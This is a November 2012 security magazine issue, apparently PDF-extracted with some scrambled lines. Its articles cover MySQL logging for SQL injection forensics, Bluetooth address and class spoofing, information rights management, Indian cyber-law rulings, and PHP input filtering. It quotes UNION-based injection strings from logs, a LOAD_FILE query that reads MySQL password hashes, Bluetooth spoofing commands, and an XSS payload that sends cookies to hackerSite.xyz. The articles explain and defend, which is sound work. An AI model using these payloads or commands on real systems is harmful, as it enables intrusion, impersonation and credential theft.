Issue34 – Nov2012 | Page-1
Issue34 – Nov2012 | Page-2
Issue34 – Nov2012 | Page-3
Issue34 – Nov2012 | Page-4
Logging in MySQL Introduction
Log Type Error log
This article demonstrates logging techniques in MySQL to uncover and analyze any mischief attempts done by (outside or inside) user focusing on specific areas in database.
General query log
What you will learn In this article I am going to talk about how logging is done in MySQL, and what all places to look for information regarding queries executed by all clients using MySQL database. Pre-requisites The reader must have basic working knowledge of MySQL and Operating System to understand technical details in this article. Getting Started Following are the types of logs available in MySQL
Binary log Relay log Slow query log
Info Written to Log Problems encountered starting, running, or stopping mysqld Established client connections and statements received from clients Statements that change data (also used for replication) Data changes received from a replication master server Queries that took more than long_query_time seconds to execute
By Default, logging is not enabled in MySQL. To enable that use command ―show processlist‖. mysql>show processlist;
Figure 1: processlist Output
Note: This shows all running queries. Info column in result shows the query which is executed.
Issue34 – Nov2012 | Page-5
Now this is only showing data for current session. If you want to see all the queries being executed on the server then you should log them first. We have seen different types of logging in MySQL, so which one to use? We will use General Log, which will give us all the queries executed at the server.
log_output = „FILE|TABLE|BOTH‟
You can change the value of this using following command
mysql> SET „FILE‟;
GLOBAL
log_output
How to go about it? Check logging is enabled or not What type of logging is enabled (FILE, TABLE, BOTH)? If not enabled, how to enable it? What to check? Checking logging is enabled or not Simply log into the MySQL prompt and issue following command mysql> show variables; This will list all the global variables in MySQL. Look for general_log variable and its value; Ideally if logging is not enabled then its value would be ―OFF‖ and general_log_file variable would be: For *NIX: “/var/lib/mysql/mysql.log” For Windows (XAMPP setup): “C:\xampp\mysql\data\<system_name>.l og” What type of logging is enabled (FILE, TABLE, BOTH)? You can determine whether logging is of what type by looking output of following variable.
Figure 2: All available variables in MySQL
=
Issue34 – Nov2012 | Page-6
If logging not enabled, how to enable it? As logging is not enabled, let‘s enable that first. To do that, issue the following command. mysql>SET GLOBAL general_log = „ON‟;
point, but in backend there are many things, like web server, database server, etc. Let‘s look at web server log (in our case its apache logs). During normal operations , things would look pretty simple and straight forward. At the glance it looks neat and clean.
mysql> SET GLOBAL general_log_file = „path_on_your_system‟; Similarly you can set the logging for slow query log. mysql>SET GLOBAL slow_query_log = „ON‟; mysql> SET GLOBAL slow_query_log_file = „path_on_your_system‟;
Slow query logs are basically those which took longer time to execute then specified value in “long_query_time”
What to check? So, we have all the required logs. What Next? Let‘s Analyze. What could be wrong? It could be attack from web, most common being SQL Injection What about somebody from inside? Privilege escalation or data stealing? In both the cases, who did it? Let‘s find out…. Case 1: Suppose, somebody got a weak link in the application, and got into the system by some SQL Injection. I don‘t have to explain what is SQL Injection is, well I may can tell you what someone can do with SQL Injection. For the attacker, there can be only one entry
Figure 3: Apache access log using Xpolog
Let‘s search for something, like ―select‖, if anyone is trying to run a SQL query
Figure 4: Filtering log on "select" command
Similarly we can search for ―union‖ or any other such SQL command to see if there is any suspicious activity is going on.
Issue34 – Nov2012 | Page-7
Figure 5: Filtering log on ''union" command
It is Interesting to see that we have some requests which have SQL queries in the request parameters. This indicates that there is something suspicious about these requests as timestamp is same for few queries. It simply means attacker has run an automated scanner to exploit the vulnerability. Suspicious log snippet: 127.0.0.1 - - [14/Sep/2012:15:45:10 +0530] "GET /sqli.php?u=999999.9%27+union+all+selec t+%28select+concat%280x7e%2C0x27%2C0x72 33646D3076335F68766A5F696E6A656374696F6 E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x3 1303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 54 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)” 127.0.0.1 - - [14/Sep/2012:15:45:10 +0530] "GET /sqli.php?u=999999.9%27+union+all+selec t+concat%280x7e%2C0x27%2Cunhex%28Hex%28 cast%28database%28%29+as+char%29%29%29% 2C0x27%2C0x7e%29%2C0x313032353438303035 36+and+%27x%27%3D%27x HTTP/1.1" 200 42 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)” 127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+selec t+concat%280x7e%2C0x27%2Cunhex%28Hex%28 cast%28user%28%29+as+char%29%29%29%2C0x 27%2C0x7e%29%2C0x31303235343830303536+a
nd+%27x%27%3D%27x HTTP/1.1" 200 47 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)” 127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+selec t+concat%280x7e%2C0x27%2Cunhex%28Hex%28 cast%28version%28%29+as+char%29%29%29%2 C0x27%2C0x7e%29%2C0x3130323534383030353 6+and+%27x%27%3D%27x HTTP/1.1" 200 39 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)” 127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+selec t+concat%280x7e%2C0x27%2Cunhex%28Hex%28 cast%28database%28%29+as+char%29%29%29% 2C0x27%2C0x7e%29%2C0x313032353438303035 36+and+%27x%27%3D%27x HTTP/1.1" 200 42 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)” 127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+selec t+concat%280x7e%2C0x27%2Cunhex%28Hex%28 cast%28system_user%28%29+as+char%29%29% 29%2C0x27%2C0x7e%29%2C0x313032353438303 03536+and+%27x%27%3D%27x HTTP/1.1" 200 47 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)” 127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+selec t+concat%280x7e%2C0x27%2Cunhex%28Hex%28 cast%28%40%40hostname+as+char%29%29%29% 2C0x27%2C0x7e%29%2C0x313032353438303035 36+and+%27x%27%3D%27x HTTP/1.1" 200 42 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)” 127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+selec t+concat%280x7e%2C0x27%2Cunhex%28Hex%28 cast%28%40%40basedir+as+char%29%29%29%2 C0x27%2C0x7e%29%2C0x3130323534383030353 6+and+%27x%27%3D%27x HTTP/1.1" 200 47 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)”
Issue34 – Nov2012 | Page-8
Once you are sure that there is an incident of SQL Injection by an unknown IP then you can proceed with the formal procedure of investigating this issue with cyber cell. Case 2: Now let‘s consider the second case, where MySQL user who has access to database has done some mischiefs. Popular activities possible are:
Running privileges escalation attacks Getting root password (will see how) Dumping database(s) into files
Note: There are few privilege escalation attacks available in Metasploit also. For getting the root password is fairly simple. A low privilege user just has to execute following command on the prompt. mysql> SELECT LOAD_FILE(„C:\xampp\mysql\data\my sql\user.MYD‟);
Note: The path will change as per the setup. If you are not getting any result then you should have physical access to this file, ssh, RDP, etc. Basically we just need data of this file. This is a binary file containing the MySQL user information with username and password. So if you are root user then you can simply run following query to see all users. mysql> select Host, User, Password from mysql.user;
Figure 6: Users table in MySQL
When low privilege user (fdb in our case) tries to run this query, obviously he will get access denied error. At this instance our previous query will be handy, reading binary file. So, what is the problem now? Simple, the password is stored in MD5 hash. Cracking this would not take much time. Note: Tools like md5crack, John the Ripper, Cain & Adel do a fine job of cracking MD5 hashes. Considering the last part, where user is dumping the database into file for some notorious purpose, we can check the same in our general_log or slow_query_log for such queries. In this case we are opening this log file in and we will do some manual analysis first. Here is snippet of the query log: 325 Connect root@localhost on 325 Init DB forensics 325 Query SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_ name as char))),0x27,0x7e) from `information_schema`.schemata limit 3,1),0x31303235343830303536 and 'x'='x' 325 Quit 326 Connect root@localhost on 326 Init DB forensics 326 Query SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_ name as char))),0x27,0x7e) from `information_schema`.schemata limit 4,1),0x31303235343830303536 and 'x'='x'
Issue34 – Nov2012 | Page-9
326 Quit 327 Connect root@localhost on 327 Init DB forensics 327 Query SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_ name as char))),0x27,0x7e) from `information_schema`.schemata limit 5,1),0x31303235343830303536 and 'x'='x' 327 Quit 328 Connect root@localhost on 328 Init DB forensics 328 Query SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_ name as char))),0x27,0x7e) from `information_schema`.schemata limit 6,1),0x31303235343830303536 and 'x'='x' 328 Quit 329 Connect root@localhost on 329 Init DB forensics 329 Query SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_ name as char))),0x27,0x7e) from `information_schema`.schemata limit 7,1),0x31303235343830303536 and 'x'='x' 329 Quit 330 Connect root@localhost on 330 Init DB forensics 330 Query SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_ name as char))),0x27,0x7e) from `information_schema`.schemata limit 8,1),0x31303235343830303536 and 'x'='x' 330 Quit
What we basically search is statements like ―union select‖, query to ―information_schema‖ database, query to ―mysql‖ database, etc. Then analyze it further to conclude on a result.
Conclusion Only logging will not do the job, it is also important to do analysis after that. Frequently, database administrator(s) only enable logging features, and leave just like that. But the actual analysis behind it is much more important. One thing that I shouldn‘t be mentioning is that, using this technique you can extract all the queries used by an automated scanner like, Havij, SQLMap, etc. I personally do not recommend that, but once you know the queries these tools run you will better understand SQL Injection. References: http://dev.mysql.com/doc/refman/5.1/en/s erver-logs.html
DhirajRanka dhiraj.ranka@niiconsulting.com DhirajRanka is currently working as Senior Security Analyst at NII Consulting, Mumbai for more than four years. He is additionally involved in intensive research and Web-based applications testing, intended primarily for executing vulnerability assessment projects and delivering trainings.
Issue34 – Nov2012 | Page-10
Cloning Bluetooth Device
In this section let‘s play with our own Bluetooth interfaces, so that we can prepare them for attack. Initial State:
[Note: This demonstration is based on article ―Bluetooth Reconnaissance – Watching over Invisible‖. Please go through it before moving forward] Well in the previous section we saw that how to find the devices which are in visible as well as in invisible mode using different tools. And also understood the different terms we get while scanning process. Here we will recall one scan information. The above screenshot is of my hci1 external Bluetooth dongle‘s initial configuration. Specially look at BD_ADDR, Name and Class. Basic and most important, first we will change BD_ADDR of device. So here in first block the Bluetooth addresses given then the clock offset and then class information. By looking at class information we can conclude which of device we have scanned.
#bdaddr -i hci1 <new_bd_addr>
Issue34 – Nov2012 | Page-11
As like hci1, we can change address of all of Bluetooth devices as want –
Why not to pick up android BD_ADDR? #bdaddr -i hci1 <BD_ADDR>
You can cross-check the configuration by#hciconfig–a
In above screenshot, you can see that both hci0 and hci1 device‘s BD_ADDR is changed. hci0 to AA:AA:AA:AA:AA:AA hci1 to BB:BB:BB:BB:BB:BB Now effectively rather than changing address to all A‘s or all B‘s, we can clone our device to any other Bluetooth devices.
So now we successfully changed the BD_ADDR. Interesting note is once BD_ADDR is changed, it will remain forever. Now let‘s change our device name #hciconfig hci1 name “android”
First scan the air:#hcitool scan
You can cross-check again and verify that name is also changed.
Issue34 – Nov2012 | Page-12
So now, does our Bluetooth device will act as phone? The answer is no. You can observe the class field. It is still 0x000000. Let‘s change its services too… #hciconfig hci1 class 0x58020c You can clearly see with these settings, when scan is made through smartphone,bt0 which is default Bluetooth interface for which we didn‘t make any changes. And name android is nothing but hci1 dongle, which we converted into android smartphone. Now you can clearly see that we changed the BD_ADDR, name and also class of our device as per our wish.
The question is why to do these changes? Basically in certain premises if any particular Bluetooth type device is blocked or not allowed, we can simply move to any other device with just few commands. The above setting also plays very important role in many attacks which we will look further.
Issue34 â&#x20AC;&#x201C; Nov2012 | Page-13
Again the question is while doing these configuration changes how to find that on which class to move? URL: http://bluetoothpentest.narod.ru/software/bluetooth_class _of_device-service_generator.html Find class of any device you wants to pick up.
Swaroop D. YermalkaR swaroop.wireless@gmail.com Swaroop is a final year engineering student from M.I.T.CollegeOf Engineering, Pune. He is enthusiastic and hobbyist for Infosec.
As per your need, you can pick up any type of device with the services you want as shown above. References: 1. http://en.wikipedia.org/wiki/Bluetooth 2. http://www.bluetooth.com 3. http://linux.die.net/man/8/hciconfig
Issue34 – Nov2012 | Page-14
Information Rights Management (IRM) Information Rights Management is the set of techniques and methods which protect the highly sensitive information of the organization irrespective of the file location whether it resides "in" or "outside" the corporate boundaries. This happens as the permissions embedded inside the file don't allow unauthorized access, modification, copying or printing. This is typically done for protection of financial documents, intellectual property such as patents, design blueprints and executive communications. IRM broadly speaking addresses the fundamental problem associated with Data Protection Leakage (DLP). DLP heavily relies on protection of sensitive file within the corporate network typically at its end points. It protects the data based on its location (directory, file server/ database) or in data in transit, but doesn't give the protection at a more granular level, i.e. information contained in file itself. IRM currently applies mainly to documents and emails in typical corporate environment setting. While DLP is ―transmission technology, IRM is ―usage technology.
control‖ control‖
Why do we need IRM? The rationale for using IRM is that the privacy information associated with data must travel along with it. The copying of that data must not lose the associated rights to that information. Rights to modify, update, restrict or even destroy that information must be retained by the individual it pertains to, even when a 3rd party holds that information. In larger context, IRM helps organizations in enforcing corporate policy governing the secure flow of highly sensitive data in the organization. File protections are defined and enforced based on user's identity along with corporate policy on a given class of data. The best way to protect information is to do it directly at the level of the information – and not at the level of many system(s) which might change, transport or store the information.
What exactly can be achieved with IRM?
Preventing restricted content from unauthorized modification, copying, printing or pasting Disabling Print Screen feature in Microsoft Windows for taking snapshots of restricted content.
Issue34 – Nov2012 | Page-15
Restricting content exposure wherever it is sent Support file expiration so that contents in documents are rendered un-viewable (or viewable) automatically after a set time. Full auditing of both access to documents as well as changes to the rights/policy by business users.
What can't be prevented using IRM?
Sensitive Content from being erased, stolen, captured or transmitted by malicious programs like Trojans, key loggers etc. Content from being lost or corrupted due to virus infection Restricted content from being handcopied or retyped from a display screen. Taking digital photograph of the restricted content displayed on a screen by unauthorized person Snapshots of restricted content are possible using 3rd party screencapture tools.
like Blu-ray, CD, DVD's, tapes, records. In United States, a legal mandate called Digital Millennium Copyright Act (DMCA) exists which imposes criminal penalties on those who make available technologies whose primary agenda is to bypass content protection technologies. Main focus of DRM is to defeat copyright infringement by putting "digital locks" to rich media eg. records, CD, DVD's etc in business to customer domain, while IRM restricts itself to sensitive information exchange in business to business domain such as merger-acquisition plans, design blueprints, patents, financial statements, strategic business plans etc.
Key for IRM’s successful implementation The strength of IRM is typically reserved for very sensitive information that travels outside organization — to vendors, suppliers, outsourced parties, partners etc. But challenges for proper authentication are quite complex outside the enterprise. Here, three approaches must be used for effective implantation of IRM enterprise based solutions: Automating policy assignment
Are Digital Rights Management (DRM) and IRM same things? Not Really. Digital Rights management (DRM) technologies are typically used by hardware manufacturers, publishers, copyright holders and individuals with the intent to limit the use of digital content and devices "after sale". It is specifically targeted to defeat any attempts for rich media piracy
More automated is policy assignment, better is IRM implementation. This happens as automation eliminates human errors resident in manual processes which in turn make it more effective. They can automatically protect documents such as price lists, product specifications, and manufacturing process description. This works effectively because if we let document authors be the sole arbiter of what to protect, it puts an unwelcome burden on
Issue34 – Nov2012 | Page-16
them. They may neglect to do it correctly, consistently, or at all. Organizations can automatically assign policies to entire information groups such as anything saved to a certain folder, content of a certain type, or information that has reached a particular stage in a workflow. This saves time, ensures consistency, and is the most efficient way to manage large volumes of sensitive information with IRM.
Dynamic policy control As business conditions evolve, IRM policies that govern the use of content must evolve as well. Regulatory changes will almost always require modifications to information policies such as patent expirations, litigation settlements, mergers and acquisitions etc. Dynamic policy control enables recipient entitlements to be changed when individual roles or business needs change, regardless of where the content resides—even when its location is unknown. Policies reside on a policy server, not within the content. So they can be changed or revoked at any time. Rights can also be set to automatically expire. Discretionary policy application In the enterprise, discretionary use of IRM is an option that should be used in addition to rather instead of automated policy application.
Audit Trail An audit trail is an unalterable, chronological log of access to a system and a record of additions, changes, and deletions to information that system manages, which lists the person accessing the system, and the time of access, and the action taken.
Steps before Implementing IRM So you are all rolled up to implement IRM solution in your company. But before that, answer this quick checklist:
Outline business areas where sensitive information is frequently exchanged? What needs to be protected (documents, email etc.) How will security policies be enforced to protect this sensitive information or communication? Who can use the information (people, group) What a user can do with that information (read, write, print or forward) When can the user access the information (time duration and dates) Where can the information be accessed from (in office, home,) What would be the consequences to the business if this information ended up in the wrong hands? Does the organization retain any employee, customer, or member information that could be used in identity theft if it were exposed, either through loss or theft?
Popular IRM Vendor List
Seclore File Secure Microsoft Integrated Management Boole Server Smart Cipher EMC IRM Product Suite
Rights
Issue34 – Nov2012 | Page-17
Challenges in IRM implementation
Lack of commitment by senior management The biggest roadblock in IRM successful implementation is the inadequate commitment shown by senior management. Management has to be convinced and made aware the value of information in the business. Consequences of losing sensitive information must be highlighted such as unwanted loss in brand image and reputation, losing client and stakeholder confidence. Unpleasant lawsuits may proceed if the leakage of sensitive information is made public.
A good practice will be to train some of the people in the organization and nurture them as champions in usage of IRM. It will be better if at least one person from every department is included as a part of the IRM implementation task force. This task force will work in close cooperation with vendors/security team during implementation process.
Common mistake made by senior managers during implementation is that they delegate the entire part of IRM implementation to the IT team and not take much responsibility for it. It is important to note that IRM must be top driven from senior management which only can bring about a cultural change in the organization. Without their support, implementation at the best stays patchy and disorganized. User Unwillingness to change IRM‘s restrictive nature and perceived usage hassles may at first not easily gel with users. Users must be made to undergo a mandatory training and awareness workshop to help ease through this process. Suggested methodology can be summarized as: Methodology for managers to inducing change in users
Unfreezing: This step alters the forces on individuals sufficiently such that they are distracted to opt for a change. It reduces the user resistance due to increased peer pressure to induce them to go for a change. Moving: This step presents direction of the change and the actual practice of learning new attitudes. Refreezing: The final step forges the changed attitudes and learned skills in users.
After the official implementation is over, these champions will provide the first point of reference and support for any issues arising in DLP to new users. Hence, user satisfaction increases and consequently resistance to adopt new technology is lowered down.
Miscellaneous Factors
External User Authentication for partners, vendors, suppliers, outsourced parties, must be strong enough and well formed. Any loose ends will damage the confidentiality of the information.
Issue34 – Nov2012 | Page-18
Most IRM's like Microsoft‘s Windows Rights Management Services are great for Windows and Office. But they are mainly for Microsoft apps. For apps like in CAD or blueprints, other solutions are either from small vendors or very limited in scope.
References: 1. http://www.iotap.com/Blog/tabid/6 73/entryid/61/Information-RightsManagement-Sharepoint-2010.aspx 2. http://en.wikipedia.org/wiki/Infor mation_Rights_Management 3. http://blogs.kuppingercole.com/kup pinger/category/information-rightsmanagement/ 4. http://covertix.blogspot.in/ 5. http://www.rcpbuyersguide.com/dl oad.php?file=whitepapers/SponsorI ndex_EMC_Whitepaper11534369.p df 6. http://www.niiconsulting.com/solut ions/information_rights_manageme nt.html
Manas Deep Manas.deep@niiconsulting.com Manasdeep currently serves as a Security Analyst in the Technical Assessment team at NII Consulting, Mumbai. His work focuses on conducting Security Audits, Vulnerability Assessment and Penetration Testing for NII‘s premier clients. He possesses strong analytical skills and likes to keep himself involved in learning new attack vectors, tools and technologies. He has flair in technical writing and shares his thoughts on his blog ―Experiencing Computing…‖ at http://manasdeeps.blogspot.in. He has also published information security paper(s) in International Journal of Computer Science and Information Security (IJCSIS) along with various seminar / conference proceedings.
Issue34 – Nov2012 | Page-19
Landmark Cases Decided by the Adjucation Office U/Chapt. IX of the IT Act (I) Shri.Thomas Raju Vs. The Branch Manager, ICICI Bank, Anna Nagar Branch, Chennai Case decided by – the Adjudicating officer, Government of Tamilnadu. Civil Jurisdiction. Petition No. 3 of 2011 Dated– 16th May, 2011 Petitioner, an employee of a Chennai based IT company, suffered a loss of Rs. 1, 62,800/- as a result of the phishing attack. The said amount was supposed to have been transferred on the account of another customer of ICICI Bank. Petitioner claimed that he had suffered a wrongful loss due to unauthorised access to his savings account at the Anna Nagar branch of ICICI Bank.
Petitioner further claimed that he had suffered a loss as bank has failed to establish a due diligence and in providing adequate checks and safeguards to prevent unauthorised access into his account. Bank had also not adhered to the KYC norms given by the RBI. The Adjudicating officer directed the ICICI bank to pay damages to the Petitioner under Section 43 of the IT Act. Following cases are decided on the same subject matter by the same authority – (Note: - Only citations are provided below, full judgments can be downloaded from http://www.tn.gov.in/departments/it.html) I) S. UmashankarVs. ICICI Bank Case decided by – the Adjudicating officer, Government of Tamilnadu. Civil Jurisdiction Petition No. 2462 of 2008 Dated – 12th April, 2010
Issue34 – Nov2012 | Page-20
II) K.J. JeevakaArasuVs. ICICI Bank Case decided by – the Adjudicating officer, Government of Tamilnadu. Civil Jurisdiction Petition No. 1/e-gov. I/2011 Dated – 6th April, 2011
SagarRahurkar contact@sagarrahurkar.com SagarRahurkar is Masters of Law, a Certified Fraud Examiner (CFE) and Certified Cyber Crime Investigator. He specializes in Cyber Laws, Fraud examination, and Intellectual Property Law related issues. He has co-authored a book titled ―Introduction to Cyber Crimes and Cyber Law‖.
Currently he works with Mahindra Special Services Group in Fraud Risk Management.
Issue34 – Nov2012 | Page-21
Automatic Request Filter in PHP Filtering plays a very important role when you are thinking about securing your application against malicious attacks. Security is a very important aspect while developing a web application. There are several kinds of attacks that could be used to break into your web application. Based on the kind of attack the results that hacker gets also varies. Suppose you have SQL injection vulnerability in your application using SQL injection vulnerability an attacker can do lots of things, simplest being getting information related to users registered in your web application. And when a hacker has information about your user he can do a lot of things. However we are not going to discuss it in detail. Filtering does not allow you to fully secure your web application but it does increase some level of security in your web application. The simplest attack that you can stop by doing request filtering is XSS.I will be giving you a step by step guide on how you can stop XSS on your web application using different techniques. In this article we will try to solve some of the questions related to filtering:
What is Filtering? Why is it required?
How can we do Request filtering in PHP? Why do we need to automate it? How can we automate it in PHP?
This is most helpful to someone who is seeking a quick reference to request filtering in PHP.
What is Filtering? Filtering in general terms can be described as removing unwanted contents from input ,validating input data against some format or converting your input data in some format so that your application does not behave in unwanted manner. There are two main types of filtering one is validation and other is sanitization.
Validation is to check if the data that is being filtered meets certain criteria. For example we can validate whether an email id is valid as it needs to follow a proper pattern. Sanitization is to either remove or encode special characters which may not be desired in a certain string. Example of sanitization may be that we encode <script> into %3Cscript%3E. Why do we need to do this will be explained in the next section.
Issue34 – Nov2012 | Page-22
Why is Filtering Required? Let‘s understand the importance of filtering by a scenario:Suppose you have a web application in which you have a Feedback section. A user need not be a member of website and he can post the feedback. Only the admin can view the feedbacks. Now if proper validation has not been done and user is able to post malicious JavaScript also then there can be a problem. How it can be a problem lets understand it. Suppose your application has some url like: www.mysite.com/feedback.php A hacker has created an application which is used to store the cookies he has stolen. Now if proper validation is not done and if your application is vulnerable to XSS he can steal your credentials by some JavaScript similar to this. <script language=”javascript”>document.l ocaltion=”http://hackerSite.xyz/ stealcookie.php?cookie=”+documen t.cookie</script> If your admin clicks on this he would be redirected to hackers application where credentials may be stored using the cookies. Now what can he do with admin credentials depends on your application but surely he is able to break into your web application which in any case should not happen. Consider a comment page is there which can be viewed by everyone and person post similar link and users happen to click on it which will lead to their accounts being compromised. Now if user accounts are compromised it will lead to a serious problem. You might be storing some sensitive information about user which if
goes into wrong hands may create some serious trouble for user and You. In the next section we will be looking forward to figure out that how can we implement filtering in PHP.
How can we do Request filtering in PHP? To do request filtering you should be able to first catch the request and then filter the data in each request attribute. I will be explaining how to capture all the requests in PHP and will be explaining two ways of filtering the Request attributes. Let us first understand how we can capture all the request attributes. PHP has three key –value based arrays for handling request $_GET, $_POST and $_REQUEST. $_GET is used to capture all the attributes sent by GET method. $_POST is used to capture all the attributes sent by POST method. $_REQUEST is combination of $_GET and $_POST. However I would suggest you not to totally depend on $_REQUEST as you might not be able to get all attributes in $_REQUEST due to some server configurations. Now to handle all this there is small piece of code. I have written a code for handling all GET attributes in a request similar approach should be used for $_POST and $_REQUEST.
Issue34 – Nov2012 | Page-23
if (! empty ($_GET)) { foreach ($_GET $value) {
as
$key
=>
//Filtering code to be put here }
} Just change the name to $_POST and $_REQUEST in foreach to implement it for other two. Now we will look forward to how can we do the filtering with two approaches 1) Using htmlentities- htmlentities is a build in function in PHP it encoded HTML to htmlentities so < is converted to ―&lt;‖ Now when you do this the browser will represent it as < but it will prevent browser from using it as HTML and so JavaScript will not be executed. Here is the htmlentities-
code
$_GET [$key] ($value)
for
implementing
For filtering data for stopping XSS we will be using FILTER_SANITIZE_ENCODED. Just try out this function and you will see the results and differences. This will help you in blocking XSS attack. Now here is the code for implementing this filter. $_GET [$key] =filter_var ($value, FILTER_SANITIZE_ENCODED); Just put this code inside foreach loop.
=
htmlentities
Just put this code inside foreach loop. 2) Using Filters in PHP-Filters is a very useful extension in PHP and you should use it in order to provide better security to your code. There are mainly two types of filters in PHP.
etc. You can think it to validate it by writing your own algorithm or use filter functions in PHP. Like for email you have FILTER_VALIDATE_EMAIL function. For more info on Filters please follow http://php.net/manual/en/book.filt er.php. Sanitize Filters-Sanitization filters sanitize data by either encoding data or removing special characters. There are many Sanitization filters and you can use them as per your requirement.
Validate Filters-This set of filters is used to validate or check if data meets certain pattern or qualification. An example can be to validate whether user has entered a valid email. So an email has some pattern like abc@somesite.com or in
Why do we need to automate it? Now you might be thinking that we can write these code in a single file and include it in each script using <?phprequire_once ?> type of functions. This approach seems good but consider a case when you have already worked on your web application and web application might be containing scripts raging from few hundreds, to as large as thousands. In this case adding the script on every page will be a tedious job and you may miss some pages. So what can we do? The answer is to automate the prepending of script. So how can we do the automation of prepending of script will be explained in next section.
Issue34 – Nov2012 | Page-24
How can we automate it in PHP? I will be explaining the two approaches for automating this in PHP. The following two approaches can be used for many things apart from filtering. 1) Using php.ini – As a developer of PHP you should know about php.ini file. php.ini file is a configuration file which is used by Apache Server to load configuration settings for your PHP. Common examples that you might hear will be setting maximum upload limit, maximum time to execute a script, register global variables etc. But we are more interested in knowing how can we force a script to prepend on every script that web-application has without touching the code. So to do this you need to open your php.ini file in a text editor and search for auto_prepend_file. Here is a screenshot:-
php.ini file whenever it starts for loading PHP configuration. Now question is where we should do configuration like this. Now your server might be having many web applications so whenever you want that your script should be implemented on all scripts on all web applications hosted on server you should go for php.ini settings however when you want settings to be applied for particular web application below is the approach. 2) Using .htaccess- .htaccess is a configuration file used by Apache web servers to configure web applications on directory bases. Search for .htaccess file inside your web application if it is not available create one .htaccess file. Whenever a document is called ‗.htaccess‘ file also needs to be loaded. Thus it may affect your performance. To implement .htaccess file.
add following code to
php_valueauto_prepend_file "" Put absolute or relative path of your filter file inside double quotes. In this case you don‘t need to restart your server. ‗.htaccess‘ file can be used for doing a lot of things. You can append as well prepend a script. Here we need to prepend the script. Put absolute path of your filter script inside the quotes that you would have created using the methods explained above. Now in order to apply these settings you need to restart your server because apache server looks into
So this is how you can automate request filtering in PHP. We have created a simple filter for stopping XSS however you can create your custom filter using the same approach as per your requirement.
ParasVij vijparas@gmail.com
Issue34 – Nov2012 | Page-25